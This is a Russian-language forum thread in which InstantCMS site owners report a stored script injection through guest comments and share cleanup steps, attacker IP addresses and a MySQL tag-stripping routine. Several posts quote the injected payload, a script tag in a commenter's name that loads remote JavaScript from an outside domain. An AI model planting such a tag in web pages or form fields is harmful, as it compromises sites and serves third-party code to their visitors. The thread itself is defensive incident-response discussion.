Обнаружен вирус на некоторых сайтах instantcms!

Проверьте свои сайты!

#16 8 марта 2018 в 10:10
Может из-за скриптов рекламы (яндекс, гугл) или статистики
#17 8 марта 2018 в 16:36
Добрые люди подсказали, за что им особое спасибо, что в гостевом комментарии зараза жила.
В базе записан как
  1. 'сергей <script src=\"//v1v.be/nb\">< /script>'
#18 8 марта 2018 в 16:47


Добрые люди подсказали, за что им особое спасибо, что в гостевом комментарии зараза жила.
В базе записан как

  1. 'сергей < /script>'

Дмитрий Ядов

странно, разве движок не режет сам такую фигню, если она может быть опасной
#19 9 марта 2018 в 11:07

Как прибить скрипты в текстовых редакторах ?

@Elv
Они прибиты — Обрабатывать типографом.

Премодерация постов с ссылками не помешала бы .

@Elv
См. выше.
Речь шла о гостевом комментарии. Пожуём, увидим.
#20 12 марта 2018 в 10:16
Уже два раза за неделю меня яндекс выкидывает из выдачи из-за этих гостевых комментариев, вот из базы у себя вытащил строчки. можете сразу эти ip-адреса в черный список ставить. Не знаю как с этим бороться, отключить гостевые комментарии что ли.
сергей <script src="//v1v.be/nb"></script>', 'tyler979slatkin@mail.ru', '176.213.16.24
сергей <script src="//v1v.be/nb"></script>', 'harriett503mccarney@inbox.ru', '176.213.24.36
#21 12 марта 2018 в 11:40
Друзья подскажите как в комментариях включить типограф.
#22 12 марта 2018 в 13:53
В настройках компонента "комментарии->опции" снимите галку "Разрешить комментирование гостям"
#23 21 марта 2018 в 14:07
Друзья, вирус продолжает атаковать, еще два ip-адреса выявилось: 5.3.201.112, 5.164.195.135. Причем гостевые комментарии пустил через модерацию, вот на этой стадии и отлавливаю сейчас. А сегодня вирус уже регистрацию прошел на сайте, но пока ничего не нашел в результате регистрации. Комментарий с зарегистрированного пользователя был оставлен, но без вирусов пока что.
Надо что то думать с этим.
#25 21 марта 2018 в 17:40

В Демо это так и надо?

@Elv
Dr Web на демо не пускает
#26 21 марта 2018 в 20:09
Добрый день, выловили вирус и у себя. Причем как в виде девушки так и в виде комментариев. Все потёрли, от яндекса пришел репорт, мол у вас пропала подмена родительской страницы, но как обезопасить себя на будущее?
#27 21 марта 2018 в 20:53

но как обезопасить себя на будущее?

@Mstislav
Я же написал. Проблему уже исправили, очень скоро будет обновление CMS.

А пока, можете воспользоваться вот такой "лечилкой" (это SQL, скопировать и вставить во вкладку sql в phpmyadmin)

  1. DROP FUNCTION IF EXISTS icmsStripTags;
  2. DELIMITER |
  3. CREATE FUNCTION icmsStripTags( Dirty VARCHAR(100) )
  4. RETURNS VARCHAR(100)
  5. DETERMINISTIC
  6. BEGIN
  7. DECLARE iStart, iEnd, iLength INT;
  8. WHILE Locate( '<', Dirty ) > 0 AND Locate( '>', Dirty, Locate( '<', Dirty )) > 0 DO
  9. BEGIN
  10. SET iStart = Locate( '<', Dirty ), iEnd = Locate( '>', Dirty, Locate('<', Dirty ));
  11. SET iLength = ( iEnd - iStart) + 1;
  12. IF iLength > 0 THEN
  13. BEGIN
  14. SET Dirty = INSERT( Dirty, iStart, iLength, '');
  15. END;
  16. END IF;
  17. END;
  18. END WHILE;
  19. RETURN Dirty;
  20. END;
  21. |
  22. DELIMITER ;
  23.  
  24. UPDATE `cms_comments` SET `author_name` = icmsStripTags(author_name) WHERE `author_name` IS NOT NULL;
  25.  
  26. DROP FUNCTION icmsStripTags;
#28 21 марта 2018 в 21:11
Спасибо!
#29 26 марта 2018 в 10:50
Еще айпишники нарушителя 176.213.4.44, 5.164.248.47, 176.59.38.217, 5.166.208.48, 5.164.248.30
#30 26 марта 2018 в 13:21
Спасибо за айпишники smile
Вы не можете отвечать в этой теме.
Войдите или зарегистрируйтесь, чтобы писать на форуме.
Используя этот сайт, вы соглашаетесь с тем, что мы используем файлы cookie.